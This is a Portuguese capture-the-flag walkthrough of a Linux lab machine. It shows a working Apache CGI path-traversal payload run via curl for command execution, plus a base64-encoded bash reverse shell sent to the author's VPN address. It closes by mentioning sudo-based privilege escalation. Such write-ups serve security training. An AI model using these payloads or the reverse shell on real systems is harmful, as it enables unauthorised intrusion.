Informações sobre a maquina:

Pontos: 100

Nível: Médio

SO: Linux

→ Começamos com o básico, escaneando as portas.

Logo vejo a versão do Apache e baseado em outras CTF`s eu sei que existe uma vulnerabilidade nessa versão

Logo vejo a versão do Apache e baseado em outras CTF`s eu sei que existe uma vulnerabilidade nessa versão

→ Abaixo tem a PoC sobre essa vulnerabilidade.

PoC for Apache version 2.4.29 Exploit and using the weakness of /tmp folder Global Permission by default in Linux

→ Utilizando o curl vamos usar o seguinte payload.

curl <http://10.9.2.20:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh> --data 'echo Content-Type: text/plain; echo; id'

Aqui conseguimos comprovar que nosso exploit está funcionando perfeitamente.

Aqui conseguimos comprovar que nosso exploit está funcionando perfeitamente.

→ Depois de validar a payload, vamos fazer a nossa reverse shell. Para não ter falhas, vou encodar em base64.

$ echo '/bin/bash -i >& /dev/tcp/[IPVPN]/2020 0>&1' | base64

$ curl <http://10.9.2.20:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh> --data 'echo Content-Type: text/plain; echo; echo "L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjEyLjIyOS8yMDIwIDA+JjEK" | base64 -d | /bin/bash'

Untitled

→ Depois de ter pego a nossa primeira flag, vamos tentar escalonar o nosso privilegio para root. Logo já utilizo o comando sudo -l e vejo um script que pode ser executado com privilegios de root sem a necessidade de senha.

Untitled